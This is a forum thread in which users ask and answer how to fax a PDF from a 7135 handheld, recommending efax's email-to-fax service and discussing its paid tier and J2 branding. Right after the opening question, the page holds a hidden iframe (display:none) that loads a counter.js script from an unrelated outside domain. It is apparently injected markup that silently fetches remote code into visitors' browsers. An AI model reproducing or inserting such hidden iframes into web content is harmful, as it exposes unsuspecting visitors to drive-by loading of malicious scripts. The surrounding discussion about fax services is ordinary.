faxing a PDF file from the 7135

I've seen other threads on this group about using a 7135 as a fax device, but can't find the answer to this:
If I have a PDF file on my compuer, can I download it to my 7135 (or write it on SD card) and use some 7135 app to fax the PDF file to some arbitrary fax number?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Send a message via ICQ to larryganz Send a message via AIM to larryganz Send a message via Yahoo to larryganz

If you have an account at www.efax.com you can email the pdf to faxnumber@efaxsend.com and they will deliver it to the fax.

indeed, i just tried it, and it appears to be for paying customers only (I have efax "free" service). Got my email bounced back to me, and was told:
"If you are registered for our Free service, you may add the ability to send faxes by logging in at http://jsource.j2.com/login.asp. and selecting 'Upgrade.'"

Interestingly, when I went to that URL, it said nothing about "efax" and was all about "j2" (they appear to have a branding issue here).

Oh well. Nice try, though. Thanks for the suggestion.

J2 had fax services before efax did, and then bought out efax a year or two ago.

I think the efax service is worth paying for. For instance, i placed an order for a gear set from autralia buy efax, it was two pages and only cost me $0.30 but a phone call on my home line to fax it costs me $4.00 a minute x 2 minutes to send two pages = $8.00

That almost pays for the service for a month right there! plus it is nice to be able to fax from my pda...
